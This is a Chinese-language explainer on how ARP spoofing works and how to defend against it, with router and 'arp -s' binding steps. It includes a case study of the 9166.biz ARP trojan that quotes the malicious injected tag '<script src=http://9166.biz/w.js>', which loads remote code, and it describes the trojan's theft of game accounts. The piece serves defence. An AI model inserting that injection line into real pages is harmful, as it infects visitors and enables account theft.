“ARP 欺骗”入侵原理和防范示例

一、什么是ARP

ARP，即地址解析协议，实现通过IP地址得知其物理地址。在TCP/IP网络环境下，每个主机都分配了一个32位的IP地址，这种互联网地址是在网际范围标识主机的一种逻辑地址。为了让报文在物理网路上传送，必须知道对方目的主机的物理地址。这样就存在把IP地址变换成物理地址的地址转换问题。

arp工作原理

以以太网环境为例，为了正确地向目的主机传送报文，必须把目的主机的32位IP地址转换成为48位以太网的地址。这就需要在互连层有一组服务将IP地址转换为相应物理地址，这组协议就是ARP协议。另有电子防翻滚系统也称为ARP。

二、“ARP 欺骗”的方式和原理

从影响网络连接通畅的方式来看，ARP 欺骗大概可以分为两种。一种是对路由器ARP表的欺骗，这种方法可以破坏系统的ARP缓存表，从而组成内外IP地址的混乱。另一种是对局域网内计算机的网关欺骗，让网内计算机系统的数据报通过假网关来发送。

当前我们办公大楼所遭遇的ARP 欺骗就属于第二种情况，由此导致局域网内计算机病毒的大肆传播。

第一种ARP 欺骗是截获网关数据。它通知路由器一系列错误的内网MAC地址，并按照一定的频率不断进行地址的更换，使真实的地址信息无法通过更新保存在路由器中，结果路由器的所有数据只能发送给错误的MAC地址，从而造成计算机访问黑客精心构建的网络陷阱。

第二种ARP 欺骗是伪造网关。它的原理是建立假网关，让被它欺骗的计算机向假网关发数据，而不是通过正常的路由器途径上网。

三、如何利用 “ARP 欺骗”入侵

黑客要利用“ARP 欺骗”入侵计算机，只需要一个前提条件，就是进行入侵的计算机和被攻击的计算机要在同一个局域网的网段中。由于ARP 欺骗是通过数据包进行欺骗的，所以在进行操作以前要在本地计算机安装一个驱动程序，为数据传输做准备，具体入侵细节不在此详述。

四、防范方法

用户若要想对ARP攻击进行有效防范，需要同时在客户端和路由器上做双向的绑定工作，这样的话无论ARP攻击是伪造本机的IP地址、MAC地址还是网关地址，都不会出现上网掉线或者大面积断线等情况。

1、激活防ARP攻击的相关项目

进入路由器Web管理页面后，选择“防火墙配置”选项中的“基本页面”，然后激活“防止ARP病毒攻击”即可。这样以后就可以避免利用ARP攻击的木马病毒传播了。

2、本地绑定IP地址和MAC地址

正常进入计算机系统后打开其中的命令提示符窗口，通过arp –s命令或者批处理命令来实现系统的绑定工作，命令格式为：arp –s [路由器IP地址] [路由器MAC地址]，回车确定以后完成每台计算机的绑定。

五、示例：9166.biz －ARP木马病毒的恶意行为与有效防范

恶意行为：

1、此木马通过网页漏洞传播，通过植入网站上的一句JS脚本，导致有XML等漏洞的机器中招，成为此ARP病毒的传播源。

2、“ARP欺骗”篡改局域网数据包，一台电脑中招，局域网内的所有用户均遭殃。该木马在整个局域网用户上网的网页中增加”<scrīpt src=http://9166.biz/w.js></scrīpt>”等内容，从而使局域网内有XML漏洞的电脑同时感染此病毒。

3、查杀困难，整个网络不时掉线。由于遭受攻击的局域网一般都是多台电脑感染，同时发起ARP攻击，因此整个局域网很不稳定，时常掉线甚至瘫痪。而且由于机器之间互相感染，因此彻底查杀及恢复非常困难。

4、后台下载多个热门游戏木马。该木马会自动到网上下载梦幻、征途、江湖、魔域、武林外传、奇迹世界、天龙八部、传奇世界、完美国际、风云、魔兽、江湖、QQ幻想等十多款网络游戏木马，偷窃用户游戏帐户。

有效防范：

1、下载安装微软MS07-17补丁。

2、关闭IE浏览器和系统还原功能。

3、清空系统的临时文件夹。

4、删除HOSTS文件中的不明网址。

5、删除不明启动项。

6、使用360安全卫士卸载插件、修复IE浏览器等。

7、安全模式下彻底杀毒。

8、9166.biz及5y5.us相关的 ARP病毒专杀。